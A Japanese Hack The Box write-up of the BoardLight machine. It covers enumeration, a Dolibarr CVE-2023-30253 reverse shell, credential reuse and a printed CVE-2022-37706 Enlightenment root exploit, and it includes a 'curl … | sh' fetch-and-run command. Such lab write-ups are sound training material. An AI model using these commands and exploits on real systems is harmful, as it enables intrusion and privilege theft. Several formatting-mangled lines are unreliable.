Writeup | Hack the Box: BoardLight (original) (raw)

Season 5終わったので公開。初参戦シーズンということもあってEASYしか解けなかったけど、今までの知識でなんとか出来た。

https://app.hackthebox.com/machines/BoardLight

echo "10.10.11.11 board.htb" | sudo tee -a /etc/hosts

nmap

nmap -sC -A board.htb

PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA) | 256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA) |_ 256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)

22: SSH
80: HTTP

標準構成

Web

http://boardlight.htb
- Burp ONで見てみる
- フォームが1つ contact.php
- action="" => 実装されていない?
- name属性もないので実装されてなさそう

なんかコメントアウトされてるページがある

http://board.htb/portfolio.php
- File not found. なさそうか
- http://board.htb/404 => これはApacheの404
- http://board.htb/test.php => File not found.
- http://board.htb/_portfolio.php => 404

ffuf

ffuf -w /usr/share/wordlists/dirb/common.txt -u http://board.htb/FUZZ.php

about [Status: 200, Size: 9100, Words: 3084, Lines: 281, Duration: 172ms] contact [Status: 200, Size: 9426, Words: 3295, Lines: 295, Duration: 164ms] do [Status: 200, Size: 9209, Words: 3173, Lines: 295, Duration: 291ms] index [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 160ms]

ffuf -w /usr/share/wordlists/dirb/common.txt -u http://board.htb/FUZZ

.htaccess [Status: 403, Size: 274, Words: 20, Lines: 10, Duration: 156ms] .hta [Status: 403, Size: 274, Words: 20, Lines: 10, Duration: 156ms] [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 309ms] .htpasswd [Status: 403, Size: 274, Words: 20, Lines: 10, Duration: 157ms] css [Status: 301, Size: 304, Words: 20, Lines: 10, Duration: 157ms] images [Status: 301, Size: 307, Words: 20, Lines: 10, Duration: 156ms] index.php [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 2280ms] js [Status: 301, Size: 303, Words: 20, Lines: 10, Duration: 156ms] server-status [Status: 403, Size: 274, Words: 20, Lines: 10, Duration: 165ms]

特に怪しいのはなし
Webの問題ではないかも

CVE-2021-40438 => SSRF?

whatweb -a 3 http://board.htb

http://board.htb [200 OK] Apache[2.4.41], Bootstrap[4.3.1], Country[RESERVED][ZZ], Email[info@board.htb], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.10.11.11], JQuery[3.4.1], Script[text/javascript], X-UA-Compatible[IE=edge]

CVE-2021-40438 => SSRF脆弱性あり
- PoC https://github.com/sergiovks/CVE-2021-40438-Apache-2.4.48-SSRF-exploit

中身はこれ

GET http://board.htb/?unix:AA...AAAA|http://127.0.0.1:3000/

pythonで実行している

python3 CVE-2021-40438.py -t http://board.htb -ssrf http://10.10.16.22:8000 | head

成功しない違うかも...

サブドメイン探索

board.htb とwebに書いてあるからサブドメインもあるか？

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
-H "Host: FUZZ.board.htb" -u http://board.htb/
-fs 15949 crm [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 6241ms]

あったわ。

echo "10.10.11.11 crm.board.htb" | sudo tee -a /etc/hosts

Dolibarr => CVE-2023-30253

http://crm.board.htb/
- Dolibarr 17.0.0
- Login/Password
CVE-2023-30253
- PHP Code Injection
https://github.com/Dolibarr/dolibarr/issues/6568#issuecomment-1912088743
- admin/admin がデフォルト
- 入れた

Current login: admin

https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253

nc -lnvp 4444

python3 exploit.py http://crm.board.htb admin admin 10.10.16.22 4444

yessss!

www-data@boardlight:~~/html/crm.board.htb/htdocs/public/website$ pwd pwd /var/www/html/crm.board.htb/htdocs/public/website www-data@boardlight:~~/html/crm.board.htb/htdocs/public/website$ whoami whoami www-data

www-data@boardlight:~$ ls -la /home ls -la /home total 12 drwxr-xr-x 3 root root 4096 May 17 01:04 . drwxr-xr-x 19 root root 4096 May 17 01:04 .. drwxr-x--- 16 larissa larissa 4096 Jun 25 03:33 larissa

larissa というのがユーザーっぽいけど、 www-data ではアクセスできない

linpears

www-data でアクセス出来そうなファイルを探す

localでhostさせておく

python3 -m http.server 8000

curl http://10.10.16.22:8000/linpeas.sh|sh

larissaのファイルがたくさん

www-data@boardlight:~/html/board.htb$ -la ls -la total 72 drwxr-xr-x 5 www-data www-data 4096 May 17 01:04 . drwxr-xr-x 4 www-data www-data 4096 May 17 01:04 .. -rw-rw-r-- 1 larissa larissa 9100 May 15 11:01 about.php -rw-rw-r-- 1 larissa larissa 9426 May 15 11:02 contact.php drwxrwxr-x 2 larissa larissa 4096 May 17 01:04 css -rw-rw-r-- 1 larissa larissa 9209 May 15 11:02 do.php drwxrwxr-x 2 larissa larissa 4096 May 17 01:04 images -rw-rw-r-- 1 larissa larissa 15949 May 15 11:02 index.php drwxrwxr-x 2 larissa larissa 4096 May 17 01:04 js

MySQL生きてそう

tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -

バックアップファイル => 収穫無し

-r-------- 1 www-data www-data 16394 May 13 13:20 /var/www/html/crm.board.htb/htdocs/conf/conf.php.old

www-data@boardlight:/html/crm.board.htb/htdocs/conf$ ls -la ls -la total 56 drwxr-xr-x 2 www-data www-data 4096 May 17 00:18 . drwxr-xr-x 79 www-data www-data 4096 Mar 4 2023 .. -rw-r--r-- 1 www-data www-data 31 Mar 4 2023 .htaccess -rw-r--r-- 1 www-data www-data 1736 May 17 00:18 conf.php -rw-r--r-- 1 www-data www-data 16394 Mar 4 2023 conf.php.example -r-------- 1 www-data www-data 16394 May 13 13:20 conf.php.old www-data@boardlight:/html/crm.board.htb/htdocs/conf$ pwd pwd /var/www/html/crm.board.htb/htdocs/conf

conf.php

$dolibarr_main_db_name='dolibarr'; $dolibarr_main_db_user='dolibarrowner'; dolibarrmaindbpass=′serverfun2dolibarr_main_db_pass='serverfun2dolibarrmaindbpass=′serverfun22023!!';

MySQL

serverfun2$2023!!

mysql -u dolibarrowner -p dolibarr

アカウントテーブル

SHOW TABLES; => llx_user

\g SELECT * FROM llx_user\G;

*************************** 1. row *************************** rowid: 1 ... login: dolibarr pass_crypted: 2y2y2y10$VevoimSke5Cd1/nX1Ql9Su6RstkTRe7UX1Or.cm8bZo56NjCMJzCm pass_temp: NULL api_key: NULL lastname: SuperAdmin *************************** 2. row *************************** rowid: 2 ... login: admin pass_crypted: 2y2y2y10$gIEKOl7VZnr5KLbBDzGbL.YuJxwz5Sdl5ji3SEuiUSlULgAhhjH96 pass_temp: NULL api_key: yr6V3pXd9QEI lastname: admin

$2y$10$ => bcrypt

=> failed

hashcat -m 3200 2y2y2y10$gIEKOl7VZnr5KLbBDzGbL.YuJxwz5Sdl5ji3SEuiUSlULgAhhjH96

user

serverfun2$2023!! というパスワードはきっとヒント
- larissaでログインしてみたら入れた

ssh larissa@board.htb
The authenticity of host 'board.htb (10.10.11.11)' can't be established. ED25519 key fingerprint is SHA256:xngtcDPqg6MrK72I6lSp/cKgP2kwzG6rx2rlahvu/v0. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'board.htb' (ED25519) to the list of known hosts. larissa@board.htb's password: Last login: Tue Jun 25 03:12:56 2024 from 10.10.14.116 larissa@boardlight:~$

larissa@boardlight:~$ cat user.txt XXXX

再び linpeas

sudoers ではない

larissa@boardlight:~~$ id uid=1000(larissa) gid=1000(larissa) groups=1000(larissa),4(adm) larissa@boardlight:~~$ sudo -l [sudo] password for larissa: Sorry, user larissa may not run sudo on localhost.

さきほどのlinpeasの結果をもう一度見る

╔══════════╣ SUID - Check easy privesc, exploits and write perms ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root 15K Jul 8 2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-sr-x 1 root root 15K Apr 8 18:36 /usr/lib/xorg/Xorg.wrap -rwsr-xr-x 1 root root 27K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset (Unknown SUID binary!)

enlightenment_sys とかいうの怪しい

Enlightenment => マシン名BoardLightだしたぶんこれっぽい

https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit

この通り実行していく

check

larissa@boardlight:~/tmp$ file /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=c32a8a1b279ba209d1029c51435d64b86ca09b8b, for GNU/Linux 3.2.0, stripped

実行しても出力なし => OK

larissa@boardlight:~~/tmp$ /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys larissa@boardlight:~~/tmp$

help => OK

larissa@boardlight:~/tmp$ /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys --help This is an internal tool for Enlightenment. do not use it.

strace

larissa@boardlight:~/tmp$ strace /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys 2>&1 | grep open openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libeina.so.1", O_RDONLY|O_CLOEXEC) = 3 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libecore.so.1", O_RDONLY|O_CLOEXEC) = 3 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libbluetooth.so.3", O_RDONLY|O_CLOEXEC) = 3 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libpthread.so.0", O_RDONLY|O_CLOEXEC) = 3 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libm.so.6", O_RDONLY|O_CLOEXEC) = 3 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/librt.so.1", O_RDONLY|O_CLOEXEC) = 3 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libdl.so.2", O_RDONLY|O_CLOEXEC) = 3 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libsystemd.so.0", O_RDONLY|O_CLOEXEC) = 3 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libunwind-x86_64.so.8", O_RDONLY|O_CLOEXEC) = 3 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libunwind.so.8", O_RDONLY|O_CLOEXEC) = 3 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libeo.so.1", O_RDONLY|O_CLOEXEC) = 3 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libefl.so.1", O_RDONLY|O_CLOEXEC) = 3 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libglib-2.0.so.0", O_RDONLY|O_CLOEXEC) = 3 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/liblzma.so.5", O_RDONLY|O_CLOEXEC) = 3 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/liblz4.so.1", O_RDONLY|O_CLOEXEC) = 3 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libgcrypt.so.20", O_RDONLY|O_CLOEXEC) = 3 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libpcre.so.3", O_RDONLY|O_CLOEXEC) = 3 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libgpg-error.so.0", O_RDONLY|O_CLOEXEC) = 3

strace exec

larissa@boardlight:~/tmp$ strace /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys 2>&1 | grep exec execve("/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys", ["/usr/lib/x86_64-linux-gnu/enligh"...], 0x7ffc29275890 /* 18 vars */) = 0

syscallが成功している

larissa@boardlight:~/tmp$ cat ex.sh #!/bin/bash

echo "CVE-2022-37706" echo "[] Trying to find the vulnerable SUID file..." echo "[] This may take few seconds..."

file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1) if [[ -z ${file} ]] then echo "[-] Couldn't find the vulnerable SUID file..." echo "[*] Enlightenment should be installed on your system." exit 1 fi

echo "[+] Vulnerable SUID binary found!" echo "[+] Trying to pop a root shell!" mkdir -p /tmp/net mkdir -p "/dev/../tmp/;/tmp/exploit"

echo "/bin/sh" > /tmp/exploit chmod a+x /tmp/exploit echo "[+] Enjoy the root shell :)" file/bin/mount−onoexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid={file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=file/bin/mount−onoexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net larissa@boardlight:~/tmp$ sh ex.sh CVE-2022-37706 [] Trying to find the vulnerable SUID file... [] This may take few seconds... ex.sh: 8: [[: not found [+] Vulnerable SUID binary found! [+] Trying to pop a root shell! [+] Enjoy the root shell :) mount: /dev/../tmp/: can't find in /etc/fstab.

whoami

root

cd /root/

ls

root.txt snap

cat root.txt

XXXX

got it!